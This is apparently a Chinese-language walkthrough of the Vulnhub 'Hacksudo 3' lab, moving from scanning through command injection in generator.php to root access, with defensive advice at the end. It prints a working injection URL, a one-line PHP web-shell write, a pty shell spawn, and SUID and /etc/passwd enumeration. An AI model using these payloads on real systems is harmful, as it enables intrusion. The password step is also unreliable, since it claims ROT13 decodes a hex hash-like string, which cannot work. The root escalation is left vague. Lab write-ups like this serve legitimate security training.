vulnhub系列7——hacksudo 3
字数 1081 2025-08-11 22:57:21

Hacksudo 3 靶场实战教学文档

1. 靶场概述

Hacksudo 3 是一个来自Vulnhub的渗透测试靶场,主要考察以下技能:

  • 信息收集
  • Web目录扫描
  • 命令注入漏洞利用
  • 权限提升技术
  • 密码破解技术

2. 环境准备

  • 下载靶机:从Vulnhub获取Hacksudo 3镜像
  • 网络配置:确保攻击机和靶机在同一网络段(如192.168.56.0/24)
  • 攻击机工具准备:
    • netdiscover
    • nmap
    • gobuster/dirbuster
    • Burp Suite
    • nc/netcat

3. 渗透测试流程

3.1 信息收集阶段

  1. 网络发现
netdiscover -r 192.168.56.0/24
  1. 端口扫描与服务识别
nmap -sV -Pn -sC 192.168.56.135

3.2 Web应用测试

  1. 目录扫描
gobuster dir -u http://192.168.56.135 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x txt,html,php,cgi
  1. 关键文件发现
  • 发现generator.php文件存在漏洞
  • 参数接收IP地址,可能存在命令注入

3.3 漏洞利用

  1. 命令注入验证
http://192.168.56.135/generator.php?ip=127.0.0.1%26%26whoami
  1. 写入Web Shell
asd&&echo '<?=system($_GET[1]);?>'>a.php
  1. 获取交互式Shell
python3 -c "import pty;pty.spawn('/bin/bash');"

3.4 权限提升

  1. 查找SUID文件
find / -perm -u=s -type f 2>/dev/null
  1. 用户信息收集
cat /etc/passwd  # 发现hacksudo用户
  1. 密码文件发现
  • /var/www目录下发现包含凭据的文件
  • 用户名:hacksudo
  • 加密密码:63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b
  1. 密码解密
  • 使用ROT13(凯撒密码,偏移量13)解密
  • 解密后获得hacksudo用户的真实密码
  1. 获取用户flag
su hacksudo
cd /home/hacksudo
cat user.txt
  1. 提权至root
  • 对获取的凭据进行进一步解密
  • 成功登录root用户

4. 关键技术点

  1. 命令注入
  • 通过IP参数注入系统命令
  • 使用&&连接多个命令
  • URL编码绕过过滤
  1. 密码破解
  • 识别加密方式(ROT13)
  • 批量解密技术
  1. 权限提升路径
  • 从Web应用权限到普通用户
  • 从普通用户到root权限

5. 防御建议

  1. 防止命令注入
  • 对用户输入进行严格过滤
  • 使用白名单验证IP地址格式
  • 避免直接拼接系统命令
  1. 密码安全
  • 避免使用可逆的简单加密
  • 使用强哈希算法(如bcrypt)
  • 不要将凭据明文存储在Web目录
  1. 系统加固
  • 限制SUID文件数量
  • 遵循最小权限原则
  • 定期审计系统文件权限

6. 总结

Hacksudo 3靶场展示了从Web应用漏洞到系统完全控制的完整渗透路径,重点考察了命令注入和密码破解技术。通过此靶场,可以学习到:

  • Web应用安全测试方法
  • 系统权限提升技巧
  • 密码分析与解密技术
  • 渗透测试的完整流程
Hacksudo 3 靶场实战教学文档 1. 靶场概述 Hacksudo 3 是一个来自Vulnhub的渗透测试靶场,主要考察以下技能: 信息收集 Web目录扫描 命令注入漏洞利用 权限提升技术 密码破解技术 2. 环境准备 下载靶机:从Vulnhub获取Hacksudo 3镜像 网络配置:确保攻击机和靶机在同一网络段(如192.168.56.0/24) 攻击机工具准备: netdiscover nmap gobuster/dirbuster Burp Suite nc/netcat 3. 渗透测试流程 3.1 信息收集阶段 网络发现 : 端口扫描与服务识别 : 3.2 Web应用测试 目录扫描 : 关键文件发现 : 发现 generator.php 文件存在漏洞 参数接收IP地址,可能存在命令注入 3.3 漏洞利用 命令注入验证 : 写入Web Shell : 获取交互式Shell : 3.4 权限提升 查找SUID文件 : 用户信息收集 : 密码文件发现 : 在 /var/www 目录下发现包含凭据的文件 用户名:hacksudo 加密密码: 63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b 密码解密 : 使用ROT13(凯撒密码,偏移量13)解密 解密后获得hacksudo用户的真实密码 获取用户flag : 提权至root : 对获取的凭据进行进一步解密 成功登录root用户 4. 关键技术点 命令注入 : 通过IP参数注入系统命令 使用 && 连接多个命令 URL编码绕过过滤 密码破解 : 识别加密方式(ROT13) 批量解密技术 权限提升路径 : 从Web应用权限到普通用户 从普通用户到root权限 5. 防御建议 防止命令注入 : 对用户输入进行严格过滤 使用白名单验证IP地址格式 避免直接拼接系统命令 密码安全 : 避免使用可逆的简单加密 使用强哈希算法(如bcrypt) 不要将凭据明文存储在Web目录 系统加固 : 限制SUID文件数量 遵循最小权限原则 定期审计系统文件权限 6. 总结 Hacksudo 3靶场展示了从Web应用漏洞到系统完全控制的完整渗透路径,重点考察了命令注入和密码破解技术。通过此靶场,可以学习到: Web应用安全测试方法 系统权限提升技巧 密码分析与解密技术 渗透测试的完整流程